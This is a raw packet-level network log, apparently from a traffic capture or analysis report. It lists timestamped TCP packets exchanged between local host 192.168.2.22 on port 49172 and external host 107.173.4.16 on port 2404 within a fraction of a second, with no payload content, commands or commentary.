Oct 12, 2024 16:40:04.096410036 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096616030 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096658945 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096714973 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096729994 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096745014 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096760035 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096774101 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096781969 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096792936 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096797943 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096816063 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096829891 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096837044 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096846104 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096862078 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096864939 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096878052 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096894979 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.096901894 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.096930027 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.097543001 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.097557068 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.097595930 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.113960028 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.177896023 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.177922010 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.177938938 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.177954912 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.177969933 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.177972078 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.177984953 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.177989960 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178008080 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178021908 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178037882 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178045988 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.178056002 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178071976 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178088903 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178097010 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.178105116 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178122044 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178134918 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178147078 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.178153992 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178170919 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178179026 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.178190947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178206921 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.178231001 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180067062 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180094004 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180111885 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180116892 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180166006 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180169106 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180182934 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180201054 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180216074 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180243969 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180243969 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180262089 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180289030 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180300951 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180304050 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180320978 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180336952 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180346012 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180363894 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180377960 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180381060 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180397034 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180412054 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180428028 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180437088 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180445910 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180480957 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180509090 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180532932 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180546045 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180551052 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180567980 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180583954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180598974 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180605888 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180617094 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180633068 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180651903 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180664062 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180677891 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180701971 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180707932 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180718899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180736065 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180764914 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180768967 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180783987 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180800915 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180810928 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180816889 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180835009 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180843115 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180851936 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180869102 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.180879116 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.180910110 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181014061 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181030035 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181045055 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181061029 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181062937 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181077003 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181118011 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181183100 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181220055 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181236982 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181252956 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181267977 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181292057 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181327105 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181354046 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181370020 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181372881 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181386948 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181402922 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181418896 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181427002 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181436062 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181452036 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181467056 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181473970 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181483984 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181499958 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181504011 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181515932 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181557894 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181698084 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181716919 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181734085 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181760073 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181770086 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181777954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181794882 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181809902 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181821108 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181826115 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181843042 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181854010 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181859970 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181885004 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181885958 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181900978 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181916952 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181926012 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181931973 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181951046 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181960106 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.181967020 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181982994 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.181998968 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182004929 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.182015896 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182032108 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182048082 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182054043 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.182064056 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182080030 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182101965 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.182585001 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182612896 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182630062 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182634115 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.182645082 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.182679892 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.190440893 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266568899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266587019 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266603947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266618013 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266634941 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266645908 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266680956 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266705036 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266721964 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266737938 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266752958 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266761065 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266768932 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266784906 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266789913 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266803980 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266819954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266844034 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266855001 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266871929 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266887903 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266905069 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266907930 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266921043 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266937971 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266954899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266957045 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.266973019 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.266985893 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.267009020 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.268767118 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268781900 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268798113 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268821955 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268826008 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.268836975 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.268838882 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268856049 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268872023 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268876076 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.268887997 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268904924 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268919945 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268929005 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.268935919 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.268959045 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269022942 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269046068 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269061089 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269076109 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269090891 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269090891 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269105911 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269115925 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269124985 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269145966 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269212961 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269237995 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269262075 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269277096 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269295931 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269304991 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269304991 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269323111 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269332886 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269336939 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269360065 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269391060 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269406080 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269421101 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269432068 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269440889 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269458055 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269491911 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269505978 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269630909 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269675970 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269701004 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269715071 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269728899 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269741058 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269746065 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269763947 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269764900 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269778013 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269793034 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269809008 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269823074 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269838095 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269838095 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269848108 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269864082 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269887924 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269898891 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269906998 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269932032 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269946098 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269962072 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269965887 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.269979954 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.269994974 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270009995 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270016909 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270026922 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270044088 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270066977 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270085096 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270100117 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270124912 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270140886 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270143986 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270162106 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270195007 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270215034 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270231962 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270246983 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270343065 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270404100 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270421028 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270436049 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270451069 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270467043 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270473957 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270483971 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270499945 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270515919 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270519018 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270531893 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270548105 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270562887 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270567894 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270596027 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270631075 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270680904 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270698071 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270715952 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270740032 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270754099 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270755053 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270771980 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270808935 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270812988 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270831108 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270847082 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270860910 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270876884 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270880938 CEST	49172	2404	192.168.2.22	107.173.4.16
Oct 12, 2024 16:40:04.270893097 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270909071 CEST	2404	49172	107.173.4.16	192.168.2.22
Oct 12, 2024 16:40:04.270915031 CEST	49172	2404	192.168.2.22	107.173.4.16
